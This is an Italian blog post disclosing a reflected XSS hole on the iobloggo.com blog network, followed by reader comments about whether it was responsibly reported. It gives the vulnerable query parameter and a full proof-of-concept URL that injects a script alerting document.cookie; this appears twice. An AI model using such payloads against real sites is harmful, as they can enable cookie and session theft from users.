XSS iobloggo.com - OWN
Ho trovato un XSS funzionante su tutto il circuito iobloggo.com. 
Basta aggiungere ad ogni blog, compresto il sito principale questa stringa:
?ajaxagent=js&this_url=//-->[XSS]
esempio:
http://www.iobloggo.com/site/index.php?ajaxagent=js&this_url=//--><script>alert(document.cookie)</script>
Come si può vedere, stiamo sfruttando un bug XSS su una pagina javascript.
Basta aggiungere ad ogni blog, compresto il sito principale questa stringa:
?ajaxagent=js&this_url=//-->[XSS]
esempio:
http://www.iobloggo.com/site/index.php?ajaxagent=js&this_url=//--><script>alert(document.cookie)</script>
Come si può vedere, stiamo sfruttando un bug XSS su una pagina javascript.
31-12-1969 alle 18:33
Molto belle le guide...le ho lette tutte e due (chiare e ricche di esempi). Il prossimo passo è: "Corso di Sicurezza Informatica a cura di Nicola Moretti. Se il tuo sito ha una falla, noi la troviamo; se nella vostra applicazione c'è un xss, noi togliamo l'xss dalla vostra applicazione". Cosa vuoi di piu dalla vita, è una delle cose piu affascinanti, e poi pensa alla fama...
31-12-1969 alle 18:33
Oddio. Le basi della sicurezza gettate ai maiali :D Hai segnalato la cosa?
31-12-1969 alle 18:33
Ehm.. in effetti non mi ricordo..:D..di solito segnalo subito..do' un'occhiata. :D
31-12-1969 alle 18:33
No, non l'avevi segnalato ;) Fortuna che di tanto in tanto, per curiosità, uso google... :) Comunque, a mio modesto avviso, è carino trovare questi buchi e non usarli a proprio uso e consumo ... ma pubblicarli su una pagina pubblica è come farlo.
31-12-1969 alle 18:33
@anija Mi dispiace per la non segnalazione. Normalmente (come per forumfree, tomshw, ecc.) provvedo subito a farlo, ancora prima della pubblicazione del messaggio (altrimenti so che tendo a dimenticarmene ^^). Per quanto riguarda la seconda parte del suo commento, ultimamente tendo a inserire le vulnerabilità all'interno del database comune di xssed.com, che permette di ricevere segnalazioni nel caso siano inserite xxs trovate nel proprio sito. Le consiglio quindi di registrarsi a tale servizio. Comunque l'xss da me trovato non ha seri veicoli di infezione, almeno a mio parere. E se guarda anche le mie guide su come sfruttarli, si basano totalmente su un approccio didattico mirato a imparare a come difendersi da questo genere di attacchi. Per ultimo, e di minore rilevanza (rispetto a quanto detto precedentemente), la legge vigente in merito non vede la segnalazione di questi bug come attacco potenziale a sistemi informatici.